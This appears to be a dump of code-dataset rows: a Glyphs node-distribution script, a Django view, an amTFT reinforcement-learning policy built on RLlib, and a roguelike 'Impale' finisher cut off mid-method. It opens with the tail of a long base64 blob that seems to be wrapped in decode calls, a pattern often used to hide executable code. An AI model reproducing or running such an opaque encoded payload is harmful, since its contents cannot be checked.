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"))) | [
"noreply@github.com"
] | SOMii-BRAND.noreply@github.com |
7d8a6721f3bcf3f674d6a94c79772d4af0b6a9be | d9aa084ac5bcfa1ac6976bd7efeea29e49191a4e | /Paths/Distribute Nodes.py | 321092bfb271571d00b99022d74233863015931e | [
"Apache-2.0"
] | permissive | davidtahim/Glyphs-Scripts | a4149cedf5d958e3beb808985f3806c70c9c4f61 | 5ed28805b5fe03c63d904ad2f79117844c22aa44 | refs/heads/master | 2021-01-20T22:59:25.348421 | 2015-02-09T15:38:33 | 2015-02-09T15:38:33 | 30,553,555 | 1 | 0 | null | 2015-02-09T19:19:39 | 2015-02-09T19:19:39 | null | UTF-8 | Python | false | false | 1,352 | py | #MenuTitle: Distribute Nodes
# -*- coding: utf-8 -*-
__doc__="""
Distributes the selected nodes horizontally or vertically, depending on the bounding box.
"""
import GlyphsApp
Font = Glyphs.font
Doc = Glyphs.currentDocument
selectedLayer = Font.selectedLayers[0]
try:
selection = selectedLayer.selection()
selectionXList = [ n.x for n in selection ]
selectionYList = [ n.y for n in selection ]
leftMostX, rightMostX = min( selectionXList ), max( selectionXList )
lowestY, highestY = min( selectionYList ), max( selectionYList )
diffX = abs(leftMostX-rightMostX)
diffY = abs(lowestY-highestY)
Font.disableUpdateInterface()
if diffX > diffY:
increment = diffX // ( len( selection ) - 1 )
sortedSelection = sorted( selection, key=lambda n: n.x)
for thisNodeIndex in range( len( selection ) ):
sortedSelection[thisNodeIndex].x = leftMostX + ( thisNodeIndex * increment )
else:
increment = diffY // ( len( selection ) - 1 )
sortedSelection = sorted( selection, key=lambda n: n.y)
for thisNodeIndex in range( len( selection ) ):
sortedSelection[thisNodeIndex].y = lowestY + ( thisNodeIndex * increment )
Font.enableUpdateInterface()
except Exception, e:
if selection == ():
print "Cannot distribute nodes: nothing selected in frontmost layer."
else:
print "Error. Cannot distribute nodes:", selection
print e
| [
"mekka@mekkablue.com"
] | mekka@mekkablue.com |
cba7b0d6c3b1dda4d96095f7b0420c56c412ab5d | 27398f603af4adad2201774cb2b4a022af0ecdc4 | /articles/views.py | 9c77f6e035b6e1acad1d95c9c8029f15a5aff1c1 | [] | no_license | shubhamsingh782/PAC | e4637db3d52974830cfd0eae51ae016faea5c397 | 5c41ab19d33e83f2b378ad9c270ac7ca6c4e8532 | refs/heads/master | 2021-01-23T03:12:53.560326 | 2017-05-28T11:42:10 | 2017-05-28T11:42:10 | 86,058,125 | 1 | 1 | null | 2017-03-29T09:19:50 | 2017-03-24T10:51:24 | JavaScript | UTF-8 | Python | false | false | 148 | py | from django.shortcuts import render
from django.http import HttpResponse
# Create your views here.
def home(request):
return HttpResponse("hello") | [
"tantric.singh73@gmail.com"
] | tantric.singh73@gmail.com |
0e4b8dce20b157e2b87c8519304573892e8f70cd | 240adb6a22740b0f8a9ec50a52b8d10c77011435 | /submission/algos/amTFT/base_policy.py | 6290e61b1278df708662a53dd429350ad4d47527 | [] | no_license | 68545324/anonymous | 5541eed64af2d9f1cbe109d4fdd22548b260c726 | 048e28b16f68b74ddaf41f8a51aa762735475a9b | refs/heads/main | 2023-08-15T05:30:49.428378 | 2021-09-24T11:05:17 | 2021-09-25T22:16:39 | 409,931,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,107 | py | import copy
import logging
from typing import Dict, TYPE_CHECKING
import numpy as np
import torch
from ray.rllib.env import BaseEnv
from ray.rllib.evaluation import MultiAgentEpisode
from ray.rllib.policy.policy import Policy
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils import override
from ray.rllib.utils.threading import with_lock
from ray.rllib.utils.torch_ops import (
convert_to_torch_tensor,
)
from ray.rllib.utils.typing import PolicyID
if TYPE_CHECKING:
from ray.rllib.evaluation import RolloutWorker
from submission.algos import hierarchical
from submission.algos.amTFT.weights_exchanger import WeightsExchanger
from submission.utils import postprocessing, restore, callbacks
from submission.algos.amTFT.base import (
AmTFTReferenceClass,
WORKING_STATES,
WORKING_STATES_IN_EVALUATION,
OPP_COOP_POLICY_IDX,
OWN_COOP_POLICY_IDX,
OWN_SELFISH_POLICY_IDX,
)
logger = logging.getLogger(__name__)
class AmTFTPolicyBase(
hierarchical.HierarchicalTorchPolicy, WeightsExchanger, AmTFTReferenceClass
):
    def __init__(self, observation_space, action_space, config, **kwargs):
        """Build an amTFT policy wrapping several nested policies.

        The policy tracks a running "debit" of how much the opponent
        deviated from cooperative play and, once the debit crosses
        ``debit_threshold``, switches to a selfish/punishing nested
        policy for some number of steps (see the amTFT paper notation
        referenced in the inline comments).
        """
        super().__init__(observation_space, action_space, config, **kwargs)

        # Accumulated deviation of the opponent from cooperation.
        self.total_debit = 0
        # Remaining steps during which the punishing policy must act.
        self.n_steps_to_punish = 0
        self.observed_n_step_in_current_epi = 0
        # Which nested policy acted last in evaluation (drives RNN resets).
        self.last_own_algo_idx_in_eval = OWN_COOP_POLICY_IDX
        # Observation bookkeeping: "*_new_*" holds the latest observation,
        # "*_previous_*" the one the last action was computed from.
        self.opp_previous_obs = None
        self.opp_new_obs = None
        self.own_previous_obs = None
        self.own_new_obs = None
        self.both_previous_raw_obs = None
        self.both_new_raw_obs = None
        self.coop_own_rnn_state_before_last_act = None
        self.coop_opp_rnn_state_before_last_act = None
        # notation T in the paper
        self.debit_threshold = config["debit_threshold"]
        # notation alpha in the paper
        self.punishment_multiplier = config["punishment_multiplier"]
        self.working_state = config["working_state"]
        assert (
            self.working_state in WORKING_STATES
        ), f"self.working_state {self.working_state}"
        self.verbose = config["verbose"]
        self.welfare_key = config["welfare_key"]
        self.auto_load_checkpoint = config.get("auto_load_checkpoint", True)
        # When enabled, the "selfish" policy is trained on the
        # opponent-negative reward instead of the plain selfish reward.
        self.punish_instead_of_selfish = config.get(
            "punish_instead_of_selfish", False
        )
        self.punish_instead_of_selfish_key = (
            postprocessing.OPPONENT_NEGATIVE_REWARD
        )

        # Evaluation states use the models in inference mode only.
        if self.working_state in WORKING_STATES_IN_EVALUATION:
            self._set_models_for_evaluation()

        # Optionally restore nested policy weights from a checkpoint
        # path stored in the config.
        if (
            self.auto_load_checkpoint
            and restore.LOAD_FROM_CONFIG_KEY in config.keys()
        ):
            print("amTFT going to load checkpoint")
            restore.before_loss_init_load_policy_checkpoint(self)
def _set_models_for_evaluation(self):
for algo in self.algorithms:
algo.model.eval()
    @with_lock
    @override(hierarchical.HierarchicalTorchPolicy)
    def _compute_action_helper(
        self, input_dict, state_batches, seq_lens, explore, timestep
    ):
        """Choose which nested policy acts, then delegate to the parent.

        Side effects: sets ``self.active_algo_idx`` (and may replace
        ``state_batches`` with a fresh RNN state when the active policy
        changes in evaluation), and records the cooperative policy's RNN
        state right before it acts.
        """
        state_batches = self._select_witch_algo_to_use(state_batches)
        self._track_last_coop_rnn_state(state_batches)
        actions, state_out, extra_fetches = super()._compute_action_helper(
            input_dict, state_batches, seq_lens, explore, timestep
        )
        if self.verbose > 1:
            print("algo idx", self.active_algo_idx, "action", actions)
            print("extra_fetches", extra_fetches)
            print("state_batches (in)", state_batches)
            print("state_out", state_out)
        return actions, state_out, extra_fetches
def _select_witch_algo_to_use(self, state_batches):
if (
self.working_state == WORKING_STATES[0]
or self.working_state == WORKING_STATES[4]
):
self.active_algo_idx = OWN_COOP_POLICY_IDX
elif (
self.working_state == WORKING_STATES[1]
or self.working_state == WORKING_STATES[3]
):
self.active_algo_idx = OWN_SELFISH_POLICY_IDX
elif self.working_state == WORKING_STATES[2]:
state_batches = self._select_algo_to_use_in_eval(state_batches)
else:
raise ValueError(
f'config["working_state"] ' f"must be one of {WORKING_STATES}"
)
return state_batches
def _select_algo_to_use_in_eval(self, state_batches):
if self.n_steps_to_punish == 0:
self.active_algo_idx = OWN_COOP_POLICY_IDX
elif self.n_steps_to_punish > 0:
self.active_algo_idx = OWN_SELFISH_POLICY_IDX
self.n_steps_to_punish -= 1
else:
raise ValueError("self.n_steps_to_punish can't be below zero")
state_batches = self._check_for_rnn_state_reset(
state_batches, "last_own_algo_idx_in_eval"
)
return state_batches
def _check_for_rnn_state_reset(self, state_batches, last_algo_idx: str):
if getattr(self, last_algo_idx) != self.active_algo_idx:
state_batches = self._get_initial_rnn_state(state_batches)
self._to_log["reset_rnn_state"] = self.active_algo_idx
setattr(self, last_algo_idx, self.active_algo_idx)
if self.verbose > 0:
print("reset_rnn_state")
else:
if "reset_rnn_state" in self._to_log.keys():
self._to_log.pop("reset_rnn_state")
return state_batches
def _get_initial_rnn_state(self, state_batches):
if "model" in self.config.keys() and self.config["model"]["use_lstm"]:
initial_state = self.algorithms[
self.active_algo_idx
].get_initial_state()
initial_state = [
convert_to_torch_tensor(s, self.device) for s in initial_state
]
initial_state = [s.unsqueeze(0) for s in initial_state]
msg = (
f"self.active_algo_idx {self.active_algo_idx} "
f"state_batches {state_batches} reset to initial rnn state"
)
# print(msg)
logger.info(msg)
return initial_state
else:
return state_batches
def _track_last_coop_rnn_state(self, state_batches):
if self.active_algo_idx == OWN_COOP_POLICY_IDX:
self.coop_own_rnn_state_before_last_act = state_batches
@override(hierarchical.HierarchicalTorchPolicy)
def _learn_on_batch(self, samples: SampleBatch):
if self.working_state == WORKING_STATES[0]:
algo_idx_to_train = OWN_COOP_POLICY_IDX
elif self.working_state == WORKING_STATES[1]:
algo_idx_to_train = OWN_SELFISH_POLICY_IDX
else:
raise ValueError(
f"self.working_state must be one of " f"{WORKING_STATES[0:2]}"
)
samples = self._modify_batch_for_policy(algo_idx_to_train, samples)
algo_to_train = self.algorithms[algo_idx_to_train]
learner_stats = {"learner_stats": {}}
learner_stats["learner_stats"][
f"algo{algo_idx_to_train}"
] = algo_to_train.learn_on_batch(samples)
if self.verbose > 1:
print(f"learn_on_batch WORKING_STATES " f"{self.working_state}")
return learner_stats
def _modify_batch_for_policy(self, algo_idx_to_train, samples):
if algo_idx_to_train == OWN_COOP_POLICY_IDX:
samples = samples.copy()
samples = self._overwrite_reward_for_policy_in_use(
samples, self.welfare_key
)
elif (
self.punish_instead_of_selfish
and algo_idx_to_train == OWN_SELFISH_POLICY_IDX
):
samples = samples.copy()
samples = self._overwrite_reward_for_policy_in_use(
samples, self.punish_instead_of_selfish_key
)
return samples
def _overwrite_reward_for_policy_in_use(self, samples_copy, welfare_key):
samples_copy[samples_copy.REWARDS] = np.array(
samples_copy.data[welfare_key]
)
logger.debug(f"overwrite reward with {welfare_key}")
return samples_copy
def on_observation_fn(self, own_new_obs, opp_new_obs, both_new_raw_obs):
# Episode provide the last action with the given last
# observation produced by this action. But we need the
# observation that cause the agent to play this action
# thus the observation n-1
if self.own_new_obs is not None:
self.own_previous_obs = self.own_new_obs
self.opp_previous_obs = self.opp_new_obs
self.both_previous_raw_obs = self.both_new_raw_obs
self.own_new_obs = own_new_obs
self.opp_new_obs = opp_new_obs
self.both_new_raw_obs = both_new_raw_obs
def on_episode_step(
self,
policy_id,
policy,
policy_ids,
episode,
worker,
base_env,
env_index,
*args,
**kwargs,
):
opp_obs, raw_obs, opp_a = self._get_information_from_opponent(
policy_id, policy_ids, episode
)
# Ignored the first step in epi because the
# actions provided are fake (they were not played)
self._on_episode_step(
opp_obs, raw_obs, opp_a, worker, base_env, episode, env_index
)
self.observed_n_step_in_current_epi += 1
def _get_information_from_opponent(self, agent_id, agent_ids, episode):
opp_agent_id = [one_id for one_id in agent_ids if one_id != agent_id][
0
]
opp_a = episode.last_action_for(opp_agent_id)
return self.opp_previous_obs, self.both_previous_raw_obs, opp_a
    def _on_episode_step(
        self,
        opp_obs,
        last_obs,
        opp_action,
        worker,
        base_env,
        episode,
        env_index,
    ):
        """Core amTFT evaluation step.

        When not currently punishing: simulate what a cooperative
        opponent would have played, update the running debit from any
        deviation, and plan a punishment phase when required. Only
        active in the full evaluation working state; no-op otherwise.
        """
        if self.working_state == WORKING_STATES[2]:

            if self._is_punishment_planned():
                self._to_log["punishing"] = True
                # self.n_steps_to_punish -= 1 Must not be here to allow
                # to use n_steps_to_punish during rollouts
                # during which on_episode_step is not called
                if self.verbose > 0:
                    print(
                        f"punishing self.n_steps_to_punish: "
                        f"{self.n_steps_to_punish}"
                    )
            else:
                self._to_log["punishing"] = False
                # Action a cooperative opponent would have taken given the
                # opponent's previous observation.
                coop_opp_simulated_action = (
                    self._simulate_action_from_cooperative_opponent(opp_obs)
                )
                # Sanity checks: exactly one (non-vectorized) env, and the
                # env snapshot from the previous step is one step behind.
                assert (
                    len(worker.async_env.env_states) == 1
                ), "amTFT in eval only works with one env not vector of envs"
                assert (
                    worker.env.step_count_in_current_episode
                    == worker.async_env.env_states[
                        0
                    ].env.step_count_in_current_episode
                )
                assert (
                    worker.env.step_count_in_current_episode
                    == self._base_env_at_last_step.get_unwrapped()[
                        0
                    ].step_count_in_current_episode
                    + 1
                )
                self._update_total_debit(
                    last_obs,
                    opp_action,
                    worker,
                    self._base_env_at_last_step,
                    episode,
                    env_index,
                    coop_opp_simulated_action,
                )
                if self._is_starting_new_punishment_required():
                    self._plan_punishment(
                        opp_action, coop_opp_simulated_action, worker, last_obs
                    )

            # Snapshot the env for next step's debit computation.
            self._base_env_at_last_step = copy.deepcopy(base_env)
            self._to_log["n_steps_to_punish"] = self.n_steps_to_punish
            self._to_log["debit_threshold"] = self.debit_threshold
def _is_punishment_planned(self):
return self.n_steps_to_punish > 0
def on_episode_start(self, *args, **kwargs):
if self.working_state in WORKING_STATES_IN_EVALUATION:
self._base_env_at_last_step = copy.deepcopy(kwargs["base_env"])
self.last_own_algo_idx_in_eval = OWN_COOP_POLICY_IDX
self.coop_opp_rnn_state_after_last_act = self.algorithms[
OPP_COOP_POLICY_IDX
].get_initial_state()
    def _simulate_action_from_cooperative_opponent(self, opp_obs):
        """Compute the action a fully cooperative opponent would take on
        *opp_obs*, advancing the simulated opponent's RNN state.

        The RNN state before the call is preserved in
        ``coop_opp_rnn_state_before_last_act`` so rollouts can restart from it.
        """
        if self.verbose > 1:
            print("opp_obs for opp coop simu nonzero obs", np.nonzero(opp_obs))
            for i, algo in enumerate(self.algorithms):
                print("algo", i, algo)
        # Keep the pre-step state around; rollouts may need to resume from it.
        self.coop_opp_rnn_state_before_last_act = (
            self.coop_opp_rnn_state_after_last_act
        )
        (
            coop_opp_simulated_action,
            self.coop_opp_rnn_state_after_last_act,
            coop_opp_extra_fetches,
        ) = self.algorithms[OPP_COOP_POLICY_IDX].compute_single_action(
            obs=opp_obs,
            state=self.coop_opp_rnn_state_after_last_act,
        )
        if self.verbose > 1:
            print(
                coop_opp_simulated_action,
                "coop_opp_extra_fetches",
                coop_opp_extra_fetches,
            )
            print(
                "state before simu coop opp",
                self.coop_opp_rnn_state_before_last_act,
            )
            print(
                "state after simu coop opp",
                self.coop_opp_rnn_state_after_last_act,
            )
        return coop_opp_simulated_action
    def _update_total_debit(
        self,
        last_obs,
        opp_action,
        worker,
        base_env,
        episode,
        env_index,
        coop_opp_simulated_action,
    ):
        """Accumulate the opponent's "debit" for defecting.

        When the opponent's real action differs from the simulated cooperative
        one, ``_compute_debit`` (subclass hook) prices the defection; at the
        very last step of the episode the debit is forced to 0.
        """
        if self.verbose > 1:
            print(
                self.own_policy_id,
                self.config[restore.LOAD_FROM_CONFIG_KEY][0].split("/")[-5],
            )
        if coop_opp_simulated_action != opp_action:
            if self.verbose > 0:
                print(
                    self.own_policy_id,
                    "coop_opp_simulated_action != opp_action:",
                    coop_opp_simulated_action,
                    opp_action,
                )
            if (
                worker.env.step_count_in_current_episode
                >= worker.env.max_steps
            ):
                # Episode is over: a defection now cannot be punished anyway.
                debit = 0
            else:
                debit = self._compute_debit(
                    last_obs,
                    opp_action,
                    worker,
                    base_env,
                    episode,
                    env_index,
                    coop_opp_simulated_action,
                )
        else:
            if self.verbose > 0:
                print(
                    "id",
                    self.own_policy_id,
                    "coop_opp_simulated_action == opp_action",
                )
            debit = 0
        tmp = self.total_debit
        self.total_debit += debit
        self._to_log["debit_this_step"] = debit
        self._to_log["total_debit"] = self.total_debit
        # summed_debit accumulates across episodes (never reset here).
        self._to_log["summed_debit"] = (
            debit + self._to_log["summed_debit"]
            if "summed_debit" in self._to_log
            else debit
        )
        if coop_opp_simulated_action != opp_action:
            if self.verbose > 0:
                print(f"debit {debit}")
                print(
                    f"self.total_debit {self.total_debit}, previous was {tmp}"
                )
        if self.verbose > 0:
            print("_update_total_debit")
            print("    debit", debit)
            print("    self.total_debit", self.total_debit)
            print("    self.summed_debit", self._to_log["summed_debit"])
            print("    self.performing_rollouts", self.performing_rollouts)
            print("    self.use_opponent_policies", self.use_opponent_policies)
def _is_starting_new_punishment_required(self, manual_threshold=None):
if manual_threshold is not None:
return self.total_debit >= manual_threshold
return self.total_debit >= self.debit_threshold
def _plan_punishment(
self, opp_action, coop_opp_simulated_action, worker, last_obs
):
if worker.env.step_count_in_current_episode >= worker.env.max_steps:
self.n_steps_to_punish = 0
else:
self.n_steps_to_punish = self._compute_punishment_duration(
opp_action, coop_opp_simulated_action, worker, last_obs
)
self.total_debit = 0
self._to_log["n_steps_to_punish"] = self.n_steps_to_punish
self._to_log["summed_n_steps_to_punish"] = (
self.n_steps_to_punish + self._to_log["summed_n_steps_to_punish"]
if "summed_n_steps_to_punish" in self._to_log
else self.n_steps_to_punish
)
if self.verbose > 0:
print(f"reset self.total_debit to 0 since planned punishement")
    def on_episode_end(self, *args, **kwargs):
        """Episode teardown: verify every opponent move was observed, then
        (in evaluation) reset the debit and any pending punishment."""
        self._defensive_check_observed_n_opp_moves(*args, **kwargs)
        self._if_in_eval_reset_debit_and_punish()
    def _defensive_check_observed_n_opp_moves(self, *args, **kwargs):
        """Sanity check (evaluation only): the policy must have observed the
        opponent exactly once per env step this episode; then reset the
        counter for the next episode."""
        if self.working_state in WORKING_STATES_IN_EVALUATION:
            assert (
                self.observed_n_step_in_current_epi
                == kwargs["base_env"].get_unwrapped()[0].max_steps
            ), (
                "Each epi, LTFT must observe the opponent each step. "
                f"Observed {self.observed_n_step_in_current_epi} times for "
                f"{kwargs['base_env'].get_unwrapped()[0].max_steps} "
                "steps per episodes."
            )
            self.observed_n_step_in_current_epi = 0
def _if_in_eval_reset_debit_and_punish(self):
if self.working_state in WORKING_STATES_IN_EVALUATION:
self.total_debit = 0
self.n_steps_to_punish = 0
if self.verbose > 0:
logger.info(
"reset self.total_debit to 0 since end of " "episode"
)
    def _compute_debit(
        self,
        last_obs,
        opp_action,
        worker,
        base_env,
        episode,
        env_index,
        coop_opp_simulated_action,
    ):
        """Abstract hook: price the opponent's defection (real *opp_action*
        vs *coop_opp_simulated_action*). Must be overridden by subclasses."""
        raise NotImplementedError()
    def _compute_punishment_duration(
        self, opp_action, coop_opp_simulated_action, worker, last_obs
    ):
        """Abstract hook: number of steps to punish for the observed
        defection. Must be overridden by subclasses."""
        raise NotImplementedError()
def _get_last_rnn_states_before_rollouts(self):
if self.config["model"]["use_lstm"]:
return {
self.own_policy_id: self._squeezes_rnn_state(
self.coop_own_rnn_state_before_last_act
),
self.opp_policy_id: self.coop_opp_rnn_state_before_last_act,
}
else:
return None
@staticmethod
def _squeezes_rnn_state(state):
return [
s.squeeze(0)
if torch and isinstance(s, torch.Tensor)
else np.squeeze(s, 0)
for s in state
]
class AmTFTCallbacks(callbacks.PolicyCallbacks):
    """Callbacks wrapper that forwards ``on_train_result`` to a single one of
    the two trained policies (calling it once is enough for both)."""

    def on_train_result(self, trainer, *args, **kwargs):
        """
        We only call this method one time for both policies in training.
        """
        policy_map = trainer.workers.local_worker().policy_map
        assert len(policy_map) == 2
        first_policy_id = next(iter(policy_map.keys()))
        self._call_method_from_policy(
            *args,
            worker=trainer.workers.local_worker(),
            method="on_train_result",
            policy=policy_map[first_policy_id],
            policy_id=first_policy_id,
            trainer=trainer,
            **kwargs,
        )
def observation_fn(
    agent_obs,
    worker: "RolloutWorker",
    base_env: BaseEnv,
    policies: Dict[PolicyID, Policy],
    episode: MultiAgentEpisode,
):
    """RLlib observation hook: feed every amTFT policy its own and its
    opponent's preprocessed observations (plus the raw pair) each step.

    Returns *agent_obs* unchanged — only side effects on the policies.
    """
    agent_ids = list(policies.keys())
    assert len(agent_ids) == 2, "amTFT Implemented for 2 players"
    for agent_id, policy in policies.items():
        if isinstance(policy, AmTFTReferenceClass):
            # The single other id in a 2-player game.
            opp_agent_id = [
                one_id for one_id in agent_ids if one_id != agent_id
            ][0]
            both_raw_obs = agent_obs
            own_raw_obs = agent_obs[agent_id]
            filtered_own_obs = postprocessing.apply_preprocessors(
                worker, own_raw_obs, agent_id
            )
            opp_raw_obs = agent_obs[opp_agent_id]
            filtered_opp_obs = postprocessing.apply_preprocessors(
                worker, opp_raw_obs, opp_agent_id
            )
            # Deep copies so the policy can keep the obs without aliasing.
            policy.on_observation_fn(
                own_new_obs=copy.deepcopy(filtered_own_obs),
                opp_new_obs=copy.deepcopy(filtered_opp_obs),
                both_new_raw_obs=copy.deepcopy(both_raw_obs),
            )
    return agent_obs
| [
"maxime_riche@hotmail.fr"
] | maxime_riche@hotmail.fr |
0de765120183e963c96ef35cf7a5098d79f772b4 | 21e5825959a886787a3915ff0d3efa86d9cd3702 | /combat/finishers/impale.py | 7b32166eb2c800a2409971f38f6bb0c6ea4ef7f5 | [
"MIT"
] | permissive | ChrisLR/Python-Roguelike-Template | e0df37752907377e606197f2469fda61202129d5 | 9b63742b0111c7e9456fb98a96a3cd28d41a1e10 | refs/heads/master | 2021-06-26T07:48:39.215338 | 2017-09-14T21:46:08 | 2017-09-14T21:46:08 | 69,761,175 | 0 | 0 | null | 2017-09-14T21:46:09 | 2016-10-01T20:09:24 | Python | UTF-8 | Python | false | false | 2,188 | py | from combat.enums import DamageType
from combat.finishers.base import Finisher
from echo import functions
from util import gridhelpers
class Impale(Finisher):
    """Finisher that impales the defender with a piercing or slashing
    melee weapon at close range."""

    name = "Impale"
    description = "Impale your enemy with a slashing or piercing weapon."
    attacker_message = "You impale {defender}'s {defender_bodypart} with your {attacker_weapon}"
    observer_message = "{attacker} impales {defender} {defender_bodypart} with {attacker_his} {attacker_weapon}"

    @classmethod
    def evaluate(cls, attack_result):
        """True when the attacker is adjacent and wields a weapon whose melee
        damage type is Pierce or Slash."""
        context = attack_result.context
        if context.distance_to > 1:
            return False
        weapon_item = context.attacker_weapon
        if not weapon_item or not hasattr(weapon_item, 'weapon'):
            return False
